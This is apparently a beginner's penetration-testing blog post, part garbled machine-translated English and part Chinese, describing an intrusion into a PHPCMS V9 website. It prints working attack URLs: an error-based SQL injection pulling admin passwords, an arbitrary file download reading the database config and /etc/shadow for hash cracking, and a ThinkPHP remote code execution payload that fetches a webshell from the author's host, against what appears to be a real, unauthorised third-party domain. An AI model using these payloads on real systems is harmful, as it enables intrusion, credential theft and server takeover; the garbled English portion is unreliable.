0X01 Foreword
It's a goal just starting to learn it penetrate this station from the beginning of school that day, just want to down in future.
May be their own information-gathering capabilities bad, right, lead to no progress has been unable to start. This is the process need to slowly accumulated. The need to study hard.
White 0X02 penetration
In just the beginning, what meal chaos sweeping subdomain C ip port next to Dan Station directory services are shining fingerprint waf online methods do, but you do not know why these sweep, sweep down to what is the point na?
This is what I want to understand if these deficiencies more exchanges
1 next to the station next to the station is the same ip above iis different stations such as the following two www.xxx.xom and www.xxx2.com which you stand next to each other is called a win any of the other is yours but If you open the other services that can no longer occupy the port 80 2C segment If your ip is 192. 168.1 .1 then 192. 168.1 . 1 - 254 are considered in this section C segment which is generally difficult to invade, there are ideas within net following a variety of unauthorized access to the invasion of 3-port to see the corresponding port open to those services to find loopholes in 4 fingerprint system quickly and accurately identify the site language, cms etc. you do not have to waste time trying to 5waf identify the parameters of sqlmap python2 sqlmap.py -u " https://www.example.com " --identify-waf - BATCH or use this tool Wafw00f
6 Table of Contents
sensitive directory
Parameters looking for from the beginning to learn the penetration of ideas injecting injection point landing back to take the shell was also looking for id = 1 only those locations where the meal is then thrown into chaos sweeping inside sqlmap
Of course, this station can not have id = 1 the injection point so vulgar
Then ...... then robots can not find a lot of things to see inside but saw only a admin.php and have no idea what it is so I thought stood on a shelf slowly learning it will always win.
Getting a start bit 0X03
Fingerprint know phpcms Google search wave phpcmsV9 getshell
There is a front desk directly getshell? ? ?
HTTP: // ximcx.cn/post-126.html here Simon teacher said very clearly
But our stand is not open frontend user registration feature is not even this could be a revision of their own phpcms
So the front desk if there is no direct getshell after one injection
The first step to obtain user authentication cookie
/index.php?m=wap&c=index&a=init&siteid=1
The second step
userid_flash = 686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 passed userid_flash
and build your sql statement
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26
Here to obtain coded then returns to the third step through a reference
third step
/index.php?m=content&c=down&a_k=
Contracting updataxml error injection
进行这个站点的测试两天了 框架PHPCMS V9 1思路 注入点是root 写shell 知道路径 可以用union联合写 但是 遇到问题说 1、限制mysqld 不允许导入 | 导出 --secure_file_prive=null 2思路二 堆叠注入 在admin表里面加入我自己的用户 但是堆叠注入不可用 3 8080开放WDCP弱密码爆破无果 爆破了一波目录 没有什么可用的价值 4利用注入点 读取wdcp账户密码 但是 phpcmsv9这里用的是updataxml报错注入 SELECT * FROM `网站的v9数据库名`.`cd_download_data` WHERE `id` = '' and updatexml(1,concat(1,((select passwd from wd_member where table_schema=wdcpdb limit 0,1))),1)#' LIMIT 1 MySQL Error : Table '网站的v9数据库名.wd_member' doesn't exist 这里报错只能在网站库里面查询 我思路少 求指教 也无果 5希望师傅们多多交流 ,小白我太难了
这是我当时在T00ls的求助 这里面都是我所遇到的问题 所以从注入点上手也得放弃
思路三 phpcmsV9.2任意文件下载 虽然没开外连 但是心想 我把他数据库密码 和ssh密码读取出来 xshell直连 或者拿这些密码去碰撞一下后台的密码也是行的啊
这里遇到问题了 由于服务器是kali不是windows 但是这个cms过滤了php的文件下载 我们构造文件名需要让liuxn解析成php这里我的构造方法
phpcms过滤*和/\ 我们再本机上面测试 1.php空格 1.php*都可以被当成我们的1.php解析 但是这里我构造1.php*不知道为什么不行 试了好久1.php空格才行的
http://www.ccc.com/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520%2526modelid%3d1%2526d%3d1%26aid%3d1
index.php?m=content&c=down&a=init&a_k=
第一个下载的文件 当然是数据库配置文件 查看密码 然后弱口令撞密码
第二个读取的是/etc/shadow/然后hash跑密码 但是无奈 跑出来了 但是22端口不对外开放 。。。
看网上说auth_key好像有点用 于是尝试行的读取一下 结果就是这个尝试 转变就到来了 读出了一个旁站!!!!!!!!!!!!!!!!!!!
都懂了吧 这个用其他旁站扫描工具扫描的时候 没扫出来
然后TK远程代码执行 这里也是试了很久 ban了很多函数 只能执行phpinfo最后直接用简单粗暴的方法
http://www.rongxinlaw.com/?s=captcha&Fuck=copy("http://你的ip/50.txt","test.php")
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck
最后 终于 终于
学习之路 少就是多 慢就是快